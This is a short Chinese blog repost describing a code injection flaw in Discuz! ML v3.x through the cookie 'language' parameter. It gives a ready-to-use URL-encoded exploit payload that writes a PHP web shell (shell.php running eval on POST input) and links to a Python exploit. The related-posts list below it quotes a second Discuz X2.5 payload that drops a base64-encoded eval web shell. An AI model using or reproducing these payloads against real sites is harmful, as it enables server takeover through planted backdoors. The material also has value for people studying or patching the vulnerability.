discuz mlv3.x命令注入

最新推荐文章于 2022-07-29 16:15:28 发布

weixin_30820151

最新推荐文章于 2022-07-29 16:15:28 发布

阅读量227

点赞数

CC 4.0 BY-SA版权

文章标签： php python

原文链接：http://www.cnblogs.com/junsec/p/11191490.html

本文分析了Discuz!ML中存在的一个安全漏洞，该漏洞源于对cookie字段处理不当，导致攻击者可通过构造特定参数实现代码执行。文中提供了漏洞利用的具体方法及示例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

　　　　本次漏洞是由于Discuz! ML对于cookie字段的不恰当处理造成的cookie字段中的language参数未经过滤，直接被拼接希尔缓存文件中，而缓存文件随后被加载，造成代码执行。

共有60出利用点，下面前台index.php代码执行：

漏洞利用exp：

%27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522mo%2522%255d%29%253b%253f%253e%27%29%29.%27

python代码：

https://github.com/AdministratorGithub/Discuz-ML-v.3.4-exp

转载于:https://www.cnblogs.com/junsec/p/11191490.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30820151

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Discuz! ML远程代码执行(CVE-2019-13956)

weixin_44368212的博客

11-05

917

一、漏洞描述该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。二、漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三、漏洞环境搭建 1、官网下载Discuz! ML V3.4,下载地址: http://discuz.ml/download 2...

discuz安装_Discuz! ml RCE漏洞复现(自写EXP分享)

weixin_39946300的博客

12-28

1007

# 000 前言大家好我是PANDA墨森，昨天公众号粉丝涨了一大波，首先感谢一下圈子社区的大力分享，也祝愿圈子社区能越办越好！今天的文章还是老样子，漏洞复现+自写EXP分享，脚本有需要的后台留言，也可以自行更改，话不多说，往下看#001 Discuz!ml简介：Discuz!ml是一套通用的社区论坛软件系统，用户可以在不需要任何编程的基础上，通过简单的设置和安装，在互联网上搭建起具备完善...

参与评论您还未登录，请先登录后发表或查看评论

[漏洞案例]Discuz ML! V3.X 代码注入漏洞

baguangman5501的博客

07-13

786

0x00 前言 Discuz！ML是一个由CodersClub.org创建的多语言，集成，功能齐全的开源网络平台，用于构建像“社交网络”这样的互联网社区。该引擎基于Comsenz Inc.创建的着名的Discuz！X引擎开发。 0x01 漏洞描述 1.1 简单描述 2019年7月11日， Discuz！ML被发现存在一处远程代码执行漏洞，攻击者通过在请求流量的cookie字段中的la...

【1】漏洞预警 | Discuz ML! V3.X 代码注入漏洞

司徒荆的博客

07-11

990

Discuz ML! V3.X存在代码注入漏洞，攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码，进一步可获取整个网站的服务器权限。

forum.php漏洞,漏洞分析 | Discuz ML! V3.x 代码注入漏洞

weixin_39560002的博客

04-09

951

2019年7月11日， Discuz！ML被发现存在一处远程代码执行漏洞，攻击者通过修改请求流量的cookie字段中的language参数处插入构造的payload，进行远程代码执行利用，该漏洞利用方式简单，危害性较大。本次漏洞是由于Discuz! ML对于cookie字段的不恰当处理造成的cookie字段中的language参数未经过滤，直接被拼接写入缓存文件之中，而缓存文件随后又被加载，从而造...

discuz hook 对应php 代码,Discuz ML V3.x 代码注入漏洞详细分析

weixin_35437039的博客

03-18

356

0x00 前言7月11号Discuz ML被爆出存在任意代码注入漏洞，Discuz在国内的用户量还是很可观的，国外还没有去关注，从官方下载源码对漏洞的原理详细的分析了一下，源码地址(http://discuz.ml/download)0x01 POCGET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64...

Elco-宜科区域检测光幕-MLV产品手册.pdf

10-16

Elco-宜科区域检测光幕-MLV产品手册pdf,Elco-宜科区域检测光幕-MLV产品手册

用于图像清晰度评估的最大局部变化（MLV）代码Matlab代码.rar

最新发布

02-07

在各种图像特征分析方法中，最大局部变化（MLV）是一种有效的图像清晰度评估方法。MLV通过计算图像局部区域的灰度变化，能够反映出图像的局部细节信息。这种方法认为，图像的清晰度越高，其局部变化的对比度也越大。...

MLV-TESTE:ESTUDOS DOS MLV

03-13

标题“MLV-TESTE: ESTUDOS DOS MLV”暗示了这可能是一个关于MLV（多层矢量，Multi-Layer Vector）技术的研究项目或测试。然而，由于标签部分为空，我们没有额外的标签信息来指导具体的技术方向。描述中的“MLV测试”...

用于图像锐度评估的最大局部变异 (MLV) 代码：用于图像锐度评估的 MLV 代码-matlab开发

05-30

本文将详细探讨基于最大局部变异（Maximum Local Variation, MLV）的无参考图像锐度评估方法，这是一种由Khosro Bahrami和Alex C. Kot提出的快速算法，并在2014年发表于IEEE信号处理信函的论文中详细介绍。该方法是...

Discuz!ML V3.X 代码注入漏洞

selecthch的博客

08-16

1059

官网下载：http://discuz.ml/download 版本：Discuz! ML v.3.4 解压后将upload所有内容放到网站目录，访问一步步安装即可。本次以论坛的主页面（index.php），作为漏洞的演示：利用Burpsuite抓包分析，漏洞点存在于cookie的xxx_language字符串，如下图箭头构造请求参数代码被成功执行，phpinfo显示...

命令注入

zwish的信安之路

08-26

1684

command_injecttion 参考文章：https://www.freebuf.com/column/146503.html Command Injection，即命令注入，是指通过提交恶意构造的参数破坏命令语句结构，从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一，国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。命令...

discuz exp 供参考

收集盒 Book box

05-03

495

4月7日 discuz X2.5版本存在此漏洞 1.注册任意账户 2.登陆用户，发表blog日志（注意是日志） 3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志，论坛根目录下生成de

【Discuz!】提示无法写入缓存文件

weixin_33795093的博客

10-04

596

2019独角兽企业重金招聘Python工程师标准>>> ...

discuz程序php木马,discuz！ML 3.x代码执行漏洞的利用

weixin_39655993的博客

03-22

305

一、漏洞原因：Discuz!ML 系统对cookie中的l接收的language参数内容未过滤，导致字符串拼接，从而执行php代码。二、环境搭建Centos7 PHP5.6漏洞源码：链接：https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw提取码：5ka0http://discuz.ml/download三、复现利用环境搭建好了，我们访问下网站网站没有问题...

Discuz! X 3.4 ML 任意代码执行漏洞复现

墙角睡大觉的专栏

07-13

4162

0X1 漏洞概述 2019年7月11日，网络上出现了一个Discuz！ML远程代码执行漏洞的PoC，研究员验证分析发现，攻击者能够利用该漏洞在请求流量的cookie字段中（language参数）插入任意代码，执行任意代码，从而实现完全远程接管整个服务器的目的，该漏洞利用方式简单，危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4、Discuz! ML v.3.3、Discuz...

Discuz! 系列＜=3.4 后台 sql注入漏洞

weixin_46801402的博客

07-29

5220

Discuz!X全版本存在SQL注入漏洞。漏洞产生的原因是source\admincp\admincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完全过滤，导致出现二次注入。在特定条件下，攻击者可以利用该漏洞获取服务器权限。...

MLV测试研究报告与MLV系列研究分析

3. MLV格式的应用场景 MLV格式主要应用于专业影视制作和高端摄影领域，特别是在需要后期处理的高分辨率和高帧率视频拍摄中。由于MLV格式能够保持更多的图像信息，它非常适合用于色彩校正、调色、视觉特效制作等后期...